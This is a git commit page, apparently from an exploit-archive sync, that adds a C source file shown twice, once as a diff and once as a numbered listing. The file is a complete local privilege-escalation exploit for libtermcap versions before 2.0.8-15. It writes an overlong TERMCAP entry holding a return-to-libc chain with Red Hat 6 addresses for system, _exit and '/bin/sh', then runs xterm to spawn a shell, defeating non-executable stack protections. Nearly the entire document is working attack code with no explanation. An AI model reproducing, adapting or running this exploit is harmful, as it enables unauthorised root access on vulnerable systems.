packetstorm sync

author: SkyperTHC 2026-03-03 06:28:55 +0000
committer: SkyperTHC 2026-03-03 06:28:55 +0000
commit: 5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
tree: dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /exploits/7350termcap/libtermcapsploit.c
parent: c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)
1 files changed, 61 insertions, 0 deletions
diff --git a/exploits/7350termcap/libtermcapsploit.c b/exploits/7350termcap/libtermcapsploit.c
new file mode 100644
index 0000000..893ca0e
--- /dev/null
+++ b/exploits/7350termcap/libtermcapsploit.c
@@ -0,0 +1,61 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <fcntl.h>
+#include <unistd.h>
+// yet another lame libtermcap<2.0.8-15 sploit by typo@scene.at (libc jumpback)
+// only made this to bypass nonexecutable stack patches - http://teso.scene.at/
+// Redhat 6 offsets (i only needed these)
+int sys = 0x401bca40; // system
+int sh = 0x4025ab12;  // /bin/sh
+int exi = 0x4020b910; // _exit
+int ran = 0x401b9928; // random offset in libc
+int eip = 2136;
+#define fil "/tmp/teso_termcap"
+#define xte "/usr/X11R6/bin/xterm"
+#define entry "xterm|"
+int main(int argc, char **argv) {
+    char *buf;
+    int fd, buflen;
+    argv++;
+    if (argc>1) // dec,!hex args
+        sys = atoi(*(argv++));
+    if (argc>2)
+        sh = atoi(*(argv++));
+    if (argc>3)
+        exi = atoi(*(argv++));
+    if (argc>4)
+        eip = atoi(*(argv++));
+    buflen = eip + 20;
+    buf = (char *) malloc(buflen);
+    memset(buf, 'x', buflen);
+    buf[buflen] = 0;
+    memcpy(buf, entry, strlen(entry));
+    memcpy (buf+buflen-4,":\\y",3);
+    memcpy(buf+eip,&sys,4); 
+    memcpy(buf+eip+4,&exi,4);
+    memcpy(buf+eip+8,&sh,4);
+    memcpy(buf+eip+12,&ran,4);
+    if ( (fd = open(fil, O_WRONLY|O_CREAT|O_TRUNC, "644"))<0) {
+        perror("cannot create file");
+        exit(EXIT_FAILURE);
+    }
+    write(fd,buf,buflen);
+    close(fd);
+    free(buf);
+    setenv("TERMCAP", fil, 1);
+    execl(xte, "xterm", NULL);
+    exit(EXIT_SUCCESS);
+}
author	SkyperTHC	2026-03-03 06:28:55 +0000
committer	SkyperTHC	2026-03-03 06:28:55 +0000
commit	5d3573ef7a109ee70416fe94db098fe6a769a798 (patch)
tree	dc2d5b294c9db8ab2db7433511f94e1c4bb8b698 /exploits/7350termcap/libtermcapsploit.c
parent	c6c59dc73cc4586357f93ab38ecf459e98675cc5 (diff)

diff --git a/exploits/7350termcap/libtermcapsploit.c b/exploits/7350termcap/libtermcapsploit.c new file mode 100644 index 0000000..893ca0e --- /dev/null +++ b/exploits/7350termcap/libtermcapsploit.c
@@ -0,0 +1,61 @@
	1	#include <stdio.h>
	2	#include <stdlib.h>
	3	#include <string.h>
	4	#include <fcntl.h>
	5	#include <unistd.h>
	6
	7	// yet another lame libtermcap<2.0.8-15 sploit by typo@scene.at (libc jumpback)
	8	// only made this to bypass nonexecutable stack patches - http://teso.scene.at/
	9
	10	// Redhat 6 offsets (i only needed these)
	11	int sys = 0x401bca40; // system
	12	int sh = 0x4025ab12; // /bin/sh
	13	int exi = 0x4020b910; // _exit
	14	int ran = 0x401b9928; // random offset in libc
	15	int eip = 2136;
	16	#define fil "/tmp/teso_termcap"
	17	#define xte "/usr/X11R6/bin/xterm"
	18	#define entry "xterm\|"
	19
	20	int main(int argc, char **argv) {
	21	char *buf;
	22	int fd, buflen;
	23
	24	argv++;
	25
	26	if (argc>1) // dec,!hex args
	27	sys = atoi(*(argv++));
	28	if (argc>2)
	29	sh = atoi(*(argv++));
	30	if (argc>3)
	31	exi = atoi(*(argv++));
	32	if (argc>4)
	33	eip = atoi(*(argv++));
	34
	35	buflen = eip + 20;
	36
	37	buf = (char *) malloc(buflen);
	38	memset(buf, 'x', buflen);
	39	buf[buflen] = 0;
	40
	41	memcpy(buf, entry, strlen(entry));
	42	memcpy (buf+buflen-4,":\\y",3);
	43
	44	memcpy(buf+eip,&sys,4);
	45	memcpy(buf+eip+4,&exi,4);
	46	memcpy(buf+eip+8,&sh,4);
	47	memcpy(buf+eip+12,&ran,4);
	48
	49	if ( (fd = open(fil, O_WRONLY\|O_CREAT\|O_TRUNC, "644"))<0) {
	50	perror("cannot create file");
	51	exit(EXIT_FAILURE);
	52	}
	53
	54	write(fd,buf,buflen);
	55	close(fd);
	56	free(buf);
	57
	58	setenv("TERMCAP", fil, 1);
	59	execl(xte, "xterm", NULL);
	60	exit(EXIT_SUCCESS);
	61	}